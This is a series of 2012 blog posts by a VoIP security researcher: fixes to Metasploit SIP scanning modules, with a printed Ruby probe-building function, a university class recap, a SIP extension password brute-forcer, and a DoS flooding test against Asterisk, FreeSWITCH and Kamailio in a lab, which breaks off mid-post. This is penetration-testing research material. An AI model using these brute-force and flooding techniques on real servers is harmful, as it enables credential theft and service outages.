Anonymoushttp://www.blogger.com/profile/09565740223441207640noreply@blogger.comtag:blogger.com,1999:blog-7743819158194184549.post-74859155213395039152012-10-08T13:03:00.001+02:002013-01-19T18:27:11.663+01:00Fixing some SIP related Metasploit modules<div style="text-align: justify;">
Hi again, while I was checking some demos for <a href="http://nicerosniunos.blogspot.com.es/2012/09/voip-class-at-vigo-university.html" target="_blank">our class</a> at Vigo University representing <a href="http://quobis.com/">Quobis</a> I noticed that Metasploit <a href="http://dev.metasploit.com/redmine/projects/framework/repository/entry/modules/auxiliary/scanner/sip/options.rb" target="_blank">options.rb</a> module (SIP scanning) wasn't working ok. I mean, it was unable to recognize a Kamailio server. Next two pictures show the difference with SIPVicious output:</div>
<div style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhbLVhyuxMC_66mSA4JpbXLE-CS4-DPCJdA28BInykOGudaHJtbXAP3z4-6EiOgO7gW_gIYmbDJ3A5sLDQUrzOwKMWx-m5qvgcxUraHTT1Fq3kYyofEEVOY1BZ5-d8lJux1IIUixph1TTE/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="65" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhbLVhyuxMC_66mSA4JpbXLE-CS4-DPCJdA28BInykOGudaHJtbXAP3z4-6EiOgO7gW_gIYmbDJ3A5sLDQUrzOwKMWx-m5qvgcxUraHTT1Fq3kYyofEEVOY1BZ5-d8lJux1IIUixph1TTE/s400/1.png" width="400" /></a></div>
<div style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZdoOFr8imqRGqHh7jY7YBQ5cmLvYbLT0W895qAAtwNRyu4n7tm205TxPn1khYFqNQPx_cMqMh7Ql21WxGfnICQRm374Lf_ORH-xqKUwT6zZ7STVCpO57y0oM7vqe2G0zx311ez4wW3FE/s1600/2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="65" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZdoOFr8imqRGqHh7jY7YBQ5cmLvYbLT0W895qAAtwNRyu4n7tm205TxPn1khYFqNQPx_cMqMh7Ql21WxGfnICQRm374Lf_ORH-xqKUwT6zZ7STVCpO57y0oM7vqe2G0zx311ez4wW3FE/s400/2.png" width="400" /></a></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Some time ago, I wrote <a href="http://nicerosniunos.blogspot.com.es/2011/09/voip-information-gathering-metasploit.html">a post</a> about this module and I remember being a bit surprised because the code doesn't respect SIP protocol at all (but It worked with Asterisk). After a quick view to Kamailio logs my suspects were confirmed, <a href="http://www.kamailio.net/docs/modules/1.6.x/sanity.html">Sanity module</a> was doing right its job dropping these packets. :)</div>
<div style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMRK4f8npV11QX5NDUKj3PwsU-pKeIzgZny_RjfJp3M7MJBfKCLlByfe2sWV7Y5ayR9jDz1OJDVehTUo9yO7tmnzTVma_E4-DMvPEndkSBBs-y4bi7mOlkWESrFb5bvyzJJ3z3AIjBP2c/s1600/4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="100" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMRK4f8npV11QX5NDUKj3PwsU-pKeIzgZny_RjfJp3M7MJBfKCLlByfe2sWV7Y5ayR9jDz1OJDVehTUo9yO7tmnzTVma_E4-DMvPEndkSBBs-y4bi7mOlkWESrFb5bvyzJJ3z3AIjBP2c/s400/4.png" width="400" /></a></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Next function defines how requests are created in actual module, If you are familiar with <a href="http://www.ietf.org/rfc/rfc3261.txt">SIP RFC</a> you probably will notice what I'm talking about. If not, I suggest you to compare it with my <i>create_request</i> function of <a href="https://github.com/jesusprubio/metasploit-sip/blob/master/sipflood.rb" target="_blank">sipflood.rb</a> module.</div>
<div style="text-align: justify;">
<br /></div>
<br />
<div style="text-align: justify;">
<span style="font-family: Trebuchet MS, sans-serif; font-size: x-small;"> def create_probe(ip)</span></div>
<div style="text-align: justify;">
<span style="font-family: Trebuchet MS, sans-serif; font-size: x-small;"> suser = Rex::Text.rand_text_alphanumeric(rand(8)+1)</span></div>
<div style="text-align: justify;">
<span style="font-family: Trebuchet MS, sans-serif; font-size: x-small;"> shost = Rex::Socket.source_address(ip)</span></div>
<div style="text-align: justify;">
<span style="font-family: Trebuchet MS, sans-serif; font-size: x-small;"> src = "#{shost}:#{datastore['CPORT']}"</span></div>
<div style="text-align: justify;">
<span style="font-family: Trebuchet MS, sans-serif; font-size: x-small;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: Trebuchet MS, sans-serif; font-size: x-small;"> data = "OPTIONS sip:#{datastore['TO']}@#{ip} SIP/2.0\r\n"</span></div>
<div style="text-align: justify;">
<span style="font-family: Trebuchet MS, sans-serif; font-size: x-small;"> data << "Via: SIP/2.0/UDP #{src};branch=z9hG4bK.#{"%.8x" % rand(0x100000000)};rport;alias\r\n"</span></div>
<div style="text-align: justify;">
<span style="font-family: Trebuchet MS, sans-serif; font-size: x-small;"> #data << "From: sip:#{suser}@#{src};tag=70c00e8c\r\n"</span></div>
<div style="text-align: justify;">
<span style="font-family: Trebuchet MS, sans-serif; font-size: x-small;"> data << "From: sip:#{suser}@#{src};tag=70c00e8c\r\n"</span></div>
<div style="text-align: justify;">
<span style="font-family: Trebuchet MS, sans-serif; font-size: x-small;"> #data << "To: sip:#{datastore['TO']}@#{ip}\r\n"</span></div>
<div style="text-align: justify;">
<span style="font-family: Trebuchet MS, sans-serif; font-size: x-small;"> data << "To: sip:#{suser}@#{ip}\r\n"</span></div>
<div style="text-align: justify;">
<span style="font-family: Trebuchet MS, sans-serif; font-size: x-small;"> data << "Call-ID: #{rand(0x100000000)}@#{shost}\r\n"</span></div>
<div style="text-align: justify;">
<span style="font-family: Trebuchet MS, sans-serif; font-size: x-small;"> data << "CSeq: 1 OPTIONS\r\n"</span></div>
<div style="text-align: justify;">
<span style="font-family: Trebuchet MS, sans-serif; font-size: x-small;"> data << "Contact: sip:#{suser}@#{src}\r\n"</span></div>
<div style="text-align: justify;">
<span style="font-family: Trebuchet MS, sans-serif; font-size: x-small;"> data << "Content-Length: 0\r\n"</span></div>
<div style="text-align: justify;">
<span style="font-family: Trebuchet MS, sans-serif; font-size: x-small;"> data << "Max-Forwards: 20\r\n"</span></div>
<div style="text-align: justify;">
<span style="font-family: Trebuchet MS, sans-serif; font-size: x-small;"> data << "User-Agent: #{suser}\r\n"</span></div>
<div style="text-align: justify;">
<span style="font-family: Trebuchet MS, sans-serif; font-size: x-small;"> data << "Accept: text/plain\r\n"</span></div>
<div style="text-align: justify;">
<span style="font-family: Trebuchet MS, sans-serif; font-size: x-small;"> end</span> </div>
<div style="text-align: justify;">
<br /></div>
<br />
<div style="text-align: justify;">
Once some changes were done in order to use my function (with OPTIONS packets), we can see that we have a correct response now.</div>
<div style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjVMcPFPKNVJ1PDp_jIXUoctVrTU2LFxEObuwku6EB39OLtABQzEBa6vhr2muJMOsiSSy6BwbgJ122QSuUWk4-gfksyL5_U5dHWmqll5y-0y1oJb05KMraZqdLI5ajzKsshbyJy18LQ_ok/s1600/3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="181" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjVMcPFPKNVJ1PDp_jIXUoctVrTU2LFxEObuwku6EB39OLtABQzEBa6vhr2muJMOsiSSy6BwbgJ122QSuUWk4-gfksyL5_U5dHWmqll5y-0y1oJb05KMraZqdLI5ajzKsshbyJy18LQ_ok/s400/3.png" width="400" /></a></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
This issue often appears working with Session Border Controllers so I coded our own version of these modules. Nothing else, here there are the links to the new version of the modules. I also added this feature to <a href="http://www.metasploit.com/modules/auxiliary/scanner/sip/enumerator">enumeration.rb</a> module, needed to brute-force valid extensions. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
- <a href="https://github.com/jesusprubio/metasploit-sip/blob/master/options.rb" target="_blank">options.rb</a><br />
- <a href="https://github.com/jesusprubio/metasploit-sip/blob/master/options_tcp.rb" target="_blank">options_tcp.rb</a><br />
- <a href="https://github.com/jesusprubio/metasploit-sip/blob/master/enumerator.rb" target="_blank">enumerator.rb</a></div>
<div style="text-align: justify;">
- <a href="https://github.com/jesusprubio/metasploit-sip/blob/master/enumerator_tcp.rb" target="_blank">enumerator_tcp.rb</a><br />
<br /></div>
<div style="text-align: justify;">
Anyway, If you try to enumerate Kamailio extensions you will fail because its default configuration avoid this. Asterisk also has an option to do it but it can be bypassed. And FreeSWITCH? We will play with all this stuff another day. ;)</div>
Anonymoushttp://www.blogger.com/profile/09565740223441207640noreply@blogger.comtag:blogger.com,1999:blog-7743819158194184549.post-20301434411965977122012-09-27T14:38:00.000+02:002012-10-18T11:23:45.308+02:00VoIP class at Vigo University<br />
<div dir="ltr" id="internal-source-marker_0.19917911513917763" style="margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 36pt;">
<span style="font-family: Arial; font-size: 15px; vertical-align: baseline;">My colleague Antón (</span><a href="https://twitter.com/AntonRoman" target="_blank"><span style="color: #1155cc; font-family: Arial; font-size: 15px; vertical-align: baseline;">@AntonRoman</span></a><span style="font-family: Arial; font-size: 15px; vertical-align: baseline;">) and myself visited last Monday the <a href="http://www.teleco.uvigo.es/" target="_blank"><span style="color: #0b5394;">Telecommunication Engineering School</span></a> at </span><a href="http://www.uvigo.es/" target="_blank"><span style="color: #1155cc; font-family: Arial; font-size: 15px; vertical-align: baseline;">Vigo University</span></a><span style="font-family: Arial; font-size: 15px; vertical-align: baseline;"> in order to give a talk about VoIP, technologies and project that we’re involved in </span><a href="http://quobis.com/" target="_blank"><span style="color: #1155cc; font-family: Arial; font-size: 15px; vertical-align: baseline;">Quobis</span></a><span style="font-family: Arial; font-size: 15px; vertical-align: baseline;">. As the year before, we were invited by the professor of the subject </span><span style="font-family: Arial; font-size: 15px; text-indent: 36pt; vertical-align: baseline;">“</span><span style="font-family: Arial; font-size: 15px; font-style: italic; text-indent: 36pt; vertical-align: baseline;">Switching laboratory”.</span><span style="font-family: Arial; font-size: 15px; text-indent: 36pt; vertical-align: baseline;">, </span><a href="http://gssi.det.uvigo.es/users/mlnores/personal/personal.html" style="text-indent: 36pt;" target="_blank"><span style="color: #1155cc; font-family: Arial; font-size: 15px; vertical-align: baseline;">Martín López Nores</span></a><span style="font-family: Arial; font-size: 15px; text-indent: 36pt; vertical-align: baseline;">, to prepare a Kamailio practical exercise.</span><br />
<span style="font-family: Arial; font-size: 15px; vertical-align: baseline;"></span></div>
<span style="font-family: Arial; font-size: 15px; vertical-align: baseline;"></span><br />
<div dir="ltr" style="margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 36pt;">
<span style="font-family: Arial; font-size: 15px; vertical-align: baseline;">Antón
started explaining some basic VoIP concepts and then he went through
more advanced ones mainly focused in Kamailio SIP server (</span><a href="http://www.slideshare.net/Quobis/presentacion-kamailio-uvigo09262011" target="_blank"><span style="color: #1155cc; font-family: Arial; font-size: 15px; vertical-align: baseline;">slides</span></a><span style="font-family: Arial; font-size: 15px; vertical-align: baseline;">).Then,
I made a review and a demo of the most common VoIP vector attacks that
we found every day “in the wild” and their available countermeasures (</span><a href="http://www.slideshare.net/Quobis/info-secvoip" target="_blank"><span style="color: #1155cc; font-family: Arial; font-size: 15px; vertical-align: baseline;">slides</span></a><span style="font-family: Arial; font-size: 15px; vertical-align: baseline;">). </span></div>
<span style="font-family: Arial; font-size: 15px; vertical-align: baseline;"></span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiiEKgYGUCFHzGoW9dhxhnDSv1CJB6DJfNpB-vmTd73KHxeAOZqaWDHRRytv7-6LKIZXCTunnxRz9427NaRrrcgpNTiDHRheWj_mwK1MJMSaPy2sXk14cXaHxZSEyhWzTjyFz9bO-3FXWk/s1600/A3qORGFCYAEyqAt.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiiEKgYGUCFHzGoW9dhxhnDSv1CJB6DJfNpB-vmTd73KHxeAOZqaWDHRRytv7-6LKIZXCTunnxRz9427NaRrrcgpNTiDHRheWj_mwK1MJMSaPy2sXk14cXaHxZSEyhWzTjyFz9bO-3FXWk/s320/A3qORGFCYAEyqAt.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi4jlBDjcSegb2hdjcdlgpAjTwmtTh6xA__IJckiFTnzh9-iMrVL3zZphssLBw0_2XLqSHSiCdU5NEoAmphrxL5PMO9ZMGnJhRtvYRLL4PEiUjVMGAbVrSJ9JFwLENu9bVew7GLvQjQlM4/s1600/A3q-2l8CUAEo-wh.jpg-large" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi4jlBDjcSegb2hdjcdlgpAjTwmtTh6xA__IJckiFTnzh9-iMrVL3zZphssLBw0_2XLqSHSiCdU5NEoAmphrxL5PMO9ZMGnJhRtvYRLL4PEiUjVMGAbVrSJ9JFwLENu9bVew7GLvQjQlM4/s320/A3q-2l8CUAEo-wh.jpg-large" width="320" /></a></div>
<div dir="ltr" style="margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<br /></div>
<div dir="ltr" style="margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="font-family: Arial; font-size: 15px; vertical-align: baseline;">As the last course, we extended the mandatory practice with an optional exercise (you can download them from the links below):</span></div>
<div dir="ltr" style="margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="font-family: Arial; font-size: 15px; vertical-align: baseline;">- </span><a href="http://www.slideshare.net/Quobis/practica-lc-20112012-14472191" target="_blank"><span style="color: #1155cc; font-family: Arial; font-size: 15px; vertical-align: baseline;">2011-2012</span></a><span style="font-family: Arial; font-size: 15px; vertical-align: baseline;"></span></div>
<div dir="ltr" style="margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="font-family: Arial; font-size: 15px; vertical-align: baseline;">- </span><a href="http://www.slideshare.net/Quobis/kamailio-practice-quobisuniversity-of-vigo-laboratory-of-commutation-20122013" target="_blank"><span style="color: #1155cc; font-family: Arial; font-size: 15px; vertical-align: baseline;">2012-2013</span></a><span style="font-family: Arial; font-size: 15px; vertical-align: baseline;"></span></div>
<span style="font-family: Arial; font-size: 15px; vertical-align: baseline;"></span><br />
<div dir="ltr" style="margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 36pt;">
<span style="font-family: Arial; font-size: 15px; vertical-align: baseline;">We
encourage the students to give it a try, I strongly think this practice
could be very useful for their professional future. In fact, Andrés
Souto (</span><a href="https://twitter.com/kai670" target="_blank"><span style="color: #1155cc; font-family: Arial; font-size: 15px; vertical-align: baseline;">@kai670</span></a><span style="font-family: Arial; font-size: 15px; vertical-align: baseline;">),
who did a great job last year while being a student of the last course,
is working now with us at Quobis. And last, but not least, we would
like to thank Martín for this opportunity of sharing a good time and
discovering skilled students.</span></div>
Anonymoushttp://www.blogger.com/profile/09565740223441207640noreply@blogger.comtag:blogger.com,1999:blog-7743819158194184549.post-72154082972266641312012-07-29T21:19:00.003+02:002012-11-09T14:01:01.980+01:00Bruteforcing SIP extensions with MetasploitHi, some time ago I published <a href="http://nicerosniunos.blogspot.com.es/2011/09/voip-information-gathering-metasploit.html" target="_blank">this post</a> about VoIP information gathering with Metasploit. For a minimal pentesting process, a module capable of bruteforcing discovered extensions password is needed. So I have developed it, if you know <a href="http://blog.sipvicious.org/" target="_blank">SIPvicious</a> suite this module provides <i>sipcrack</i> tool features.<br />
<br />
Based on available SIP related modules I implemented <a href="http://www.site.uottawa.ca/~bob/gradstudents/DigestAuthenticationReport.pdf" target="_blank">SIP Digest Authentication algorithm</a> and <i>Msf::Auxiliary::AuthBrute</i> mixin does the magic with possible user/password combinations. This picture shows an example of use in which extension 100 password is discovered (<i>100</i>).<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjPJyNI7fgHZUqCrj6gGG1blyUT9P1ykcft-9mzZNBhFtkUe76vVXugBt4xLZHRTVMfgTAGT7UP7WX9Mvn1YZOyQFQbxmCNJBDercVHDSDSbOmKthof2GoRQNlopGhDwo5AIDNobnqSgRo/s1600/Captura+de+pantalla+de+2012-07-27+23:49:29.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="223" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjPJyNI7fgHZUqCrj6gGG1blyUT9P1ykcft-9mzZNBhFtkUe76vVXugBt4xLZHRTVMfgTAGT7UP7WX9Mvn1YZOyQFQbxmCNJBDercVHDSDSbOmKthof2GoRQNlopGhDwo5AIDNobnqSgRo/s400/Captura+de+pantalla+de+2012-07-27+23:49:29.png" width="400" /></a></div>
<br />
Source code:<br />
<ul>
<li><a href="https://github.com/jesusprubio/metasploit-sip/blob/master/sipcrack.rb" target="_blank">UDP version</a></li>
<li><a href="https://github.com/jesusprubio/metasploit-sip/blob/master/sipcrack_tcp.rb" target="_blank">TCP version </a></li>
</ul>
<br />
In case you use the module outside a LAN is strongly recommended to add you external IP address (option "EXTIP"), trying to avoid SIP and NAT problems.<br />
<br />
Bye ;)Anonymoushttp://www.blogger.com/profile/09565740223441207640noreply@blogger.comtag:blogger.com,1999:blog-7743819158194184549.post-45443346907285017872012-05-01T20:05:00.000+02:002012-08-28T12:23:54.854+02:00Flooding Asterisk, Freeswitch and Kamailio with Metasploit<span style="font-family: 'Trebuchet MS', sans-serif;">Hi, it has been a long time since my last post because of my new job and my final year project ("VoIP denegation of service attacks" for curious) but there is something I found during my tests with <a href="http://www.freeswitch.org/" target="_blank">Freeswitch</a>, <a href="http://www.kamailio.org/w/" target="_blank">Kamailio</a> and <a href="http://www.asterisk.org/" target="_blank">Asterisk</a> that I want to share.</span><br />
<span style="font-family: 'Trebuchet MS', sans-serif; font-size: xx-small;">NOTE: Really, guys of <a href="http://www.securitybydefault.com/" target="_blank">Security By Default</a> blog published us (my good friend <a href="https://twitter.com/#%21/rmallof" target="_blank">Roi Mallo</a> and me) <a href="http://www.securitybydefault.com/2012/03/desarrollando-para-metasploit-ii.html" target="_blank">two articles</a> about how to develop modules for Metasploit framework, another two are coming. ;)</span><br />
<span style="font-family: 'Trebuchet MS', sans-serif; font-size: xx-small;"><br /></span>
<span style="font-family: 'Trebuchet MS', sans-serif;">During my project, among others, I developed a Metasploit module which can flood SIP protocol with common frames (INVITE, OPTIONS, REGISTER, BYE), I wrote it at Quobis (nice job ;) in order to use it for some private tests because actual software didn´t fit our needs, so we are going to probe how is the behavior of different GPL VoIP servers against this kind of attacks:</span><br />
<span style="font-family: 'Trebuchet MS', sans-serif;">- Asterisk: I think it needs no introduction, the famous softswitch/PBX software.</span><br />
<span style="font-family: 'Trebuchet MS', sans-serif;">- Freeswitch: It´s a newer softswitch that seems to be Asterisk replacement and I really like.</span><br />
<span style="font-family: 'Trebuchet MS', sans-serif; text-align: left;">- Kamailio (former OpenSER): It is the most known GPL </span><a href="http://www.voip-info.org/wiki/view/SIP+proxy" style="font-family: 'Trebuchet MS', sans-serif; text-align: left;" target="_blank">SIP proxy</a><span style="font-family: 'Trebuchet MS', sans-serif; text-align: left;">.</span><br />
<div style="text-align: center;">
<span style="font-family: 'Trebuchet MS', sans-serif; margin-left: 1em; margin-right: 1em; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEic6k8NpPzXDsro_vYxKWzXcCuREM4-SogJsEACpUjE2OIExE_y-6AXzxoueZHGQVsow2_npEnQaHCKvkxqdR5kDugmHgWP7Esjr9m1ZtChwpb5C29WeFSJtWlD7wVaUAPp1M38_ySdrGE/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em; text-align: center;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEic6k8NpPzXDsro_vYxKWzXcCuREM4-SogJsEACpUjE2OIExE_y-6AXzxoueZHGQVsow2_npEnQaHCKvkxqdR5kDugmHgWP7Esjr9m1ZtChwpb5C29WeFSJtWlD7wVaUAPp1M38_ySdrGE/s400/1.png" width="265" /></a></span></div>
<div style="text-align: center;">
<span style="font-family: 'Trebuchet MS', sans-serif; font-size: x-small;">Virtual machines</span></div>
<span style="font-family: 'Trebuchet MS', sans-serif;">First of all I want to be clear about two things:</span><br />
<span style="font-family: 'Trebuchet MS', sans-serif;">- Test were made without any protection on the server side, in a real environment we shoud find (in theory xD) something like Iptables, Snort, Fail2ban, <a href="http://www.kamailio.org/docs/modules/1.4.x/pike.html" target="_blank">Pike</a> or a propietary <a href="http://en.wikipedia.org/wiki/Session_border_controller" target="_blank">Session border controller</a> in large arquitectures. Anyway, it should be enough for this proof of concept.</span><br />
<span style="font-family: 'Trebuchet MS', sans-serif;">- Asterisk and Freeswitch are <a href="http://en.wikipedia.org/wiki/Private_branch_exchange#Private_branch_exchange" target="_blank">PBX</a> software, they were not designed to run between the limits of the infrastructure and Internet, although they are usually placed there. In fact, one of the reason of this post is to show the importance of using a SIP Proxy because of security and performance reasons.</span><br />
<span style="font-family: 'Trebuchet MS', sans-serif;"><br /></span>
<span style="font-family: 'Trebuchet MS', sans-serif;">Next pictures show an example of the Metasploit module use and generated traffic, we will use the same attack against differents IPs, so I´m showing it once only:</span><br />
<div class="separator" style="clear: both; text-align: center;">
<span style="color: black; font-family: 'Trebuchet MS', sans-serif; margin-left: 1em; margin-right: 1em;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUwH5Mk_D0i409X7GjD4GVaQiOczwv9HMDFkLTScE_weihm5VEplog_xHZyD9W-dp5H_0whTqyAYefaXOsj8TIGYLwaanom27KrHDSEcz_yQIUuhc8xrHIV3o0zklUlYTC0TuVzP5ZD7w/s1600/2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="357" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUwH5Mk_D0i409X7GjD4GVaQiOczwv9HMDFkLTScE_weihm5VEplog_xHZyD9W-dp5H_0whTqyAYefaXOsj8TIGYLwaanom27KrHDSEcz_yQIUuhc8xrHIV3o0zklUlYTC0TuVzP5ZD7w/s400/2.png" width="400" /></a></span></div>
<div style="text-align: center;">
<span style="font-family: 'Trebuchet MS', sans-serif; font-size: x-small;">Module use and config</span><br />
<div class="separator" style="clear: both; text-align: center;">
<span style="color: black; font-family: 'Trebuchet MS', sans-serif; margin-left: 1em; margin-right: 1em;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEha6M86ddi4mDnHs9PI-rKG150D1d4sH6l0Y8aHChN_uq2exxdT2h-ly7GQqpxHu2KVgraIF4UVCcaXn2Wom3o7cJX0h7UxEnP6JsRhYXMZAhK7nwcoqaprcf8Raf6rTfs6_a7tFMqXy4U/s1600/3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="280" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEha6M86ddi4mDnHs9PI-rKG150D1d4sH6l0Y8aHChN_uq2exxdT2h-ly7GQqpxHu2KVgraIF4UVCcaXn2Wom3o7cJX0h7UxEnP6JsRhYXMZAhK7nwcoqaprcf8Raf6rTfs6_a7tFMqXy4U/s400/3.png" width="400" /></a></span></div>
</div>
<div style="text-align: center;">
<span style="font-family: 'Trebuchet MS', sans-serif; font-size: x-small;">Captured traffic</span></div>
<span style="font-family: 'Trebuchet MS', sans-serif;">I chose INVITE packets because they are much more effective against all kind of SIP devices and TIMEOUT to 0 trying to get more traffic. Then, the results:</span><br />
<span style="font-family: 'Trebuchet MS', sans-serif; font-size: xx-small;">NOTE: With Wireshark filter "sip.Method==REGISTER or sip.Status-Code==200 and !sdp" we can see if a softphone (<a href="http://jitsi.org/" target="_blank">Jitsi</a> in this case) could be registered , this way we can confirm if tested software losts some REGISTER packages under attack.</span><br />
<div class="separator" style="clear: both; text-align: center;">
<span style="color: black; font-family: 'Trebuchet MS', sans-serif; margin-left: 1em; margin-right: 1em;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjOM8GUUmkDjcmnQWO55anHZZ5va32wlzg7bK6ze9rwlUUh12Tb9bz3ev49GDT-OlNFVBla-FtHhPgaOI-6kUKK3GqfANy372rKHZiKO3kzd4BLqD8nEHQljByKhSYgzS_PFm9dodirvQs/s1600/Captura+de+pantalla+de+2012-05-01+13:41:29.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="358" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjOM8GUUmkDjcmnQWO55anHZZ5va32wlzg7bK6ze9rwlUUh12Tb9bz3ev49GDT-OlNFVBla-FtHhPgaOI-6kUKK3GqfANy372rKHZiKO3kzd4BLqD8nEHQljByKhSYgzS_PFm9dodirvQs/s400/Captura+de+pantalla+de+2012-05-01+13:41:29.png" width="400" /></a></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="color: black; font-family: 'Trebuchet MS', sans-serif; margin-left: 1em; margin-right: 1em;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiSO4KQNID8NWCRd_-xujZ8oqrqjL6afTbkSzWs1-I0pGYOvpZMsttI09jDG3QOLI3UdKnXsi1hi25TKITAoG5zBamndf_jXBrmi7pDgDhhnmGmUb44wKGInEXysyAPvRhmAbFIPsQDnqk/s1600/Captura+de+pantalla+de+2012-05-01+13:47:10.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="340" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiSO4KQNID8NWCRd_-xujZ8oqrqjL6afTbkSzWs1-I0pGYOvpZMsttI09jDG3QOLI3UdKnXsi1hi25TKITAoG5zBamndf_jXBrmi7pDgDhhnmGmUb44wKGInEXysyAPvRhmAbFIPsQDnqk/s400/Captura+de+pantalla+de+2012-05-01+13:47:10.png" width="400" /></a></span></div>
<div style="text-align: center;">
<span style="font-family: 'Trebuchet MS', sans-serif; font-size: x-small;">Metasploit vs. Asterisk</span></div>
<div style="text-align: center;">
<div class="separator" style="clear: both; text-align: center;">
<span style="color: black; font-family: 'Trebuchet MS', sans-serif; margin-left: 1em; margin-right: 1em;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi-7MzRPCOEFG8h5-I4O1YUrNcsFv9YMGH5IxUkfVWHiZm4S8nborwg-nPVSuFpC3CJvmdH4HNY-GVdGP0MXKElvoNH_gM7MePVlFHls9_QRRXIbW0fPooNYJDtAVveKrb7DDXHFb88664/s1600/Captura+de+pantalla+de+2012-05-01+17%253A29%253A05.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="358" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi-7MzRPCOEFG8h5-I4O1YUrNcsFv9YMGH5IxUkfVWHiZm4S8nborwg-nPVSuFpC3CJvmdH4HNY-GVdGP0MXKElvoNH_gM7MePVlFHls9_QRRXIbW0fPooNYJDtAVveKrb7DDXHFb88664/s400/Captura+de+pantalla+de+2012-05-01+17%253A29%253A05.png" width="400" /></a></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="color: black; font-family: 'Trebuchet MS', sans-serif; margin-left: 1em; margin-right: 1em;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFXPqrgmfY0WN6USQmsPyX6ni66rirGV2g7rhf0-XKnEFfU0CQKaUnt2PKqqBwoenOUQR28UU5NH0m05vASjfXbMwDqSvon62jhV8C0vOh5yYTxyhDU6uUY-vXTjROK9tMvByLLuoXISc/s1600/Captura+de+pantalla+de+2012-05-01+17%253A29%253A13.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="358" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFXPqrgmfY0WN6USQmsPyX6ni66rirGV2g7rhf0-XKnEFfU0CQKaUnt2PKqqBwoenOUQR28UU5NH0m05vASjfXbMwDqSvon62jhV8C0vOh5yYTxyhDU6uUY-vXTjROK9tMvByLLuoXISc/s400/Captura+de+pantalla+de+2012-05-01+17%253A29%253A13.png" width="400" /></a></span></div>
<div class="separator" style="clear: both; text-align: center;">
